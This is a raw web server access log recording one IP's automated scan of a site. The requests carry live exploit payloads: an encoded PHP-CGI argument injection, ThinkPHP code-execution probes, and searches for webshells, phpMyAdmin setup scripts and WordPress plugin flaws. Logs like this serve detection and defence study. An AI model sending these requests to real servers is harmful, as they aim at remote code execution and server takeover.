106.13.208.37 - - [01/Jan/2021:11:39:50 +0100] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:39:50 +0100] "POST /%62%61%73%65/%70%6F%73%74%2E%70%68%70 HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
106.13.208.37 - - [01/Jan/2021:11:39:51 +0100] "GET /webdav/ HTTP/1.1" 404 312 "-" "Mozilla/5.0"
106.13.208.37 - - [01/Jan/2021:11:39:51 +0100] "GET /%69%73%70%69%72%69%74/%69%6D/%75%70%6C%6F%61%64%2E%70%68%70 HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:51 +0100] "GET /help.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:51 +0100] "GET /java.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:52 +0100] "GET /_query.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:52 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:52 +0100] "GET /db_cts.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:52 +0100] "GET /db_pma.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:52 +0100] "GET /logon.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:53 +0100] "GET /help-e.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:53 +0100] "GET /license.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:53 +0100] "GET /log.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:53 +0100] "GET /hell.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:54 +0100] "GET /pmd_online.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:54 +0100] "GET /x.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:54 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:54 +0100] "GET /htdocs.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:54 +0100] "GET /b.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:55 +0100] "GET /sane.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:55 +0100] "GET /desktop.ini.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:55 +0100] "GET /z.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:55 +0100] "GET /lala.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:56 +0100] "GET /lala-dpr.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:56 +0100] "GET /wpc.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:56 +0100] "GET /wpo.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:57 +0100] "GET /t6nv.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:57 +0100] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:57 +0100] "GET /text.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:57 +0100] "GET /wp-config.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:58 +0100] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:58 +0100] "GET /muhstik2.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:58 +0100] "GET /muhstiks.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:58 +0100] "GET /muhstik-dpr.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:58 +0100] "GET /lol.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:59 +0100] "GET /uploader.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:59 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:39:59 +0100] "GET /cmv.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:00 +0100] "GET /cmdd.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:00 +0100] "GET /knal.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
212.91.246.72 - - [01/Jan/2021:11:40:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.208.37 - - [01/Jan/2021:11:40:00 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:00 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:01 +0100] "GET /appserv.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:01 +0100] "GET /scripts/setup.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:01 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:01 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:01 +0100] "GET /scripts/db___.init.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:02 +0100] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:02 +0100] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:02 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:02 +0100] "GET /PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:03 +0100] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:03 +0100] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:03 +0100] "GET /pma/scripts/db___.init.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:03 +0100] "GET /PMA/scripts/db___.init.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:03 +0100] "GET /myadmin/scripts/db___.init.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:04 +0100] "GET /MyAdmin/scripts/db___.init.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:04 +0100] "GET /plugins/weathermap/editor.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:04 +0100] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:04 +0100] "GET /weathermap/editor.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:05 +0100] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:05 +0100] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:05 +0100] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:05 +0100] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 363 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:05 +0100] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:06 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:06 +0100] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:06 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:07 +0100] "GET /d7.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:07 +0100] "GET /rxr.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:07 +0100] "GET /1x.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:07 +0100] "GET /home.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:08 +0100] "GET /undx.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:08 +0100] "GET /spider.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:08 +0100] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:09 +0100] "GET /composers.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:09 +0100] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:09 +0100] "GET /composer.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:09 +0100] "GET /hue2.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:10 +0100] "GET /Drupal.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:10 +0100] "GET /lang.php?f=1 HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:10 +0100] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:10 +0100] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:10 +0100] "GET /new_license.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:11 +0100] "GET /images/!.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:11 +0100] "GET /images/vuln.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:12 +0100] "GET /hd.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:12 +0100] "GET /images/up.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:12 +0100] "GET /images/attari.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:13 +0100] "GET /images/jsspwneed.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:13 +0100] "GET /images/stories/cmd.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:16 +0100] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:17 +0100] "GET /up.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:17 +0100] "GET /laravel.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:17 +0100] "GET /huoshan.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:17 +0100] "GET /yu.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:22 +0100] "GET /floaw.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:22 +0100] "GET /ftmabc.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:22 +0100] "GET /doudou.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:22 +0100] "GET /mjx.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:23 +0100] "GET /xiaoxia.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:23 +0100] "GET /yuyang.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:23 +0100] "GET /zz.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:24 +0100] "GET /coonig.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:24 +0100] "GET /ak.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:25 +0100] "GET /baidoubi.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:25 +0100] "GET /hhhhhh.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:25 +0100] "GET /meijianxue.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:26 +0100] "GET /no1.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:26 +0100] "GET /python.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:27 +0100] "GET /woshimengmei.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:28 +0100] "GET /indea.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:28 +0100] "GET /taisui.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:29 +0100] "GET /xiaxia.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:29 +0100] "GET /kk.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:29 +0100] "GET /xsser.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:30 +0100] "GET /zzz.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:31 +0100] "GET /99.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:31 +0100] "GET /dp.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:33 +0100] "GET /hs.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:33 +0100] "GET /1ts.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:34 +0100] "GET /haiyan.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:34 +0100] "GET /phpdm.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:34 +0100] "GET /root.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:34 +0100] "GET /5678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:34 +0100] "GET /root11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:35 +0100] "GET /xiu.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
106.13.208.37 - - [01/Jan/2021:11:40:36 +0100] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 350 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
